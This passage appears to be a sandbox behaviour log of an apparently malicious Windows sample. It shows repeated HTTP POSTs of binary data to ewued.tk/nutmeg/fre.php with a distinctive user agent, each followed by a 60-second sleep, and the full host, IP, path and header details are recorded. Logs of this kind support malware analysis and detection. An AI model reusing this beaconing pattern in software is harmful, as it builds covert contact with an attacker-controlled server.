| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 104.24.103.63, remote_port = 80 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size = 235, size_out = 235 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = ewued.tk, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php |
|
1 | |
| Inet | Send HTTP Request | headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 163, size_out = 163 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4048, size_out = 360 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| System | Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
4 | |
| DNS | Resolve Name | host = ÅÐÐÑÐÐÑ, service = 80 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
3 | |
| DNS | Resolve Name | host = ewued.tk, address_out = 104.24.103.63, 104.24.102.63, service = 80 |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 104.24.103.63, remote_port = 80 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size = 235, size_out = 235 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = ewued.tk, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php |
|
1 | |
| Inet | Send HTTP Request | headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 163, size_out = 163 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4048, size_out = 360 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| System | Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
4 | |
| DNS | Resolve Name | host = ÅÐÐÑÐÐÑ, service = 80 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
3 | |
| DNS | Resolve Name | host = ewued.tk, address_out = 104.24.102.63, 104.24.103.63, service = 80 |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 104.24.102.63, remote_port = 80 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size = 235, size_out = 235 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = ewued.tk, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php |
|
1 | |
| Inet | Send HTTP Request | headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 163, size_out = 163 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4048, size_out = 360 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| System | Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
4 | |
| DNS | Resolve Name | host = ÅÐÐÑÐÐÑ, service = 80 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
3 | |
| DNS | Resolve Name | host = ewued.tk, address_out = 104.24.102.63, 104.24.103.63, service = 80 |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 104.24.102.63, remote_port = 80 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size = 235, size_out = 235 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = ewued.tk, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php |
|
1 | |
| Inet | Send HTTP Request | headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 163, size_out = 163 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4048, size_out = 360 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| System | Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
4 | |
| DNS | Resolve Name | host = ÅÐÐÑÐÐÑ, service = 80 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
3 | |
| DNS | Resolve Name | host = ewued.tk, address_out = 104.24.102.63, 104.24.103.63, service = 80 |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 104.24.102.63, remote_port = 80 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size = 235, size_out = 235 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = ewued.tk, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php |
|
1 | |
| Inet | Send HTTP Request | headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 163, size_out = 163 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4048, size_out = 360 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| System | Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
4 | |
| DNS | Resolve Name | host = ÅÐÐÑÐÐÑ, service = 80 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
3 | |
| DNS | Resolve Name | host = ewued.tk, address_out = 104.24.102.63, 104.24.103.63, service = 80 |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 104.24.102.63, remote_port = 80 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size = 235, size_out = 235 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = ewued.tk, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php |
|
1 | |
| Inet | Send HTTP Request | headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 163, size_out = 163 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4048, size_out = 360 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| System | Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
4 | |
| DNS | Resolve Name | host = ÅÐÐÑÐÐÑ, service = 80 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
3 | |
| DNS | Resolve Name | host = ewued.tk, address_out = 104.24.102.63, 104.24.103.63, service = 80 |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 104.24.102.63, remote_port = 80 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size = 235, size_out = 235 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = ewued.tk, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php |
|
1 | |
| Inet | Send HTTP Request | headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 163, size_out = 163 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4048, size_out = 360 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| System | Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
4 | |
| DNS | Resolve Name | host = ÅÐÐÑÐÐÑ, service = 80 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
3 | |
| DNS | Resolve Name | host = ewued.tk, address_out = 104.24.102.63, 104.24.103.63, service = 80 |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 104.24.102.63, remote_port = 80 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size = 235, size_out = 235 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = ewued.tk, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php |
|
1 | |
| Inet | Send HTTP Request | headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 163, size_out = 163 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4048, size_out = 360 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| System | Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
4 | |
| DNS | Resolve Name | host = ÅÐÐÑÐÐÑ, service = 80 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
3 | |
| DNS | Resolve Name | host = ewued.tk, address_out = 104.24.102.63, 104.24.103.63, service = 80 |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 104.24.102.63, remote_port = 80 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size = 235, size_out = 235 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = ewued.tk, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php |
|
1 | |
| Inet | Send HTTP Request | headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 163, size_out = 163 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4048, size_out = 360 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| System | Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
4 | |
| DNS | Resolve Name | host = ÅÐÐÑÐÐÑ, service = 80 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
3 | |
| DNS | Resolve Name | host = ewued.tk, address_out = 104.24.102.63, 104.24.103.63, service = 80 |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 104.24.102.63, remote_port = 80 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size = 235, size_out = 235 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = ewued.tk, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php |
|
1 | |
| Inet | Send HTTP Request | headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 163, size_out = 163 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4048, size_out = 360 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| System | Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
4 | |
| DNS | Resolve Name | host = ÅÐÐÑÐÐÑ, service = 80 |
|
1 | |
|
For performance reasons, the remaining 184 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Thread 0xf98
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xd0c
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xc6c
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xcfc
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0x7e4
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0x2d4
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0x510
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xe38
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xe10
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xe20
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xe28
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xe24
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xdf8
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xe00
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0x858
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xeac
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xec4
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0x1a0
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xc30
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xf4c
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
Thread 0xa7c
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 |
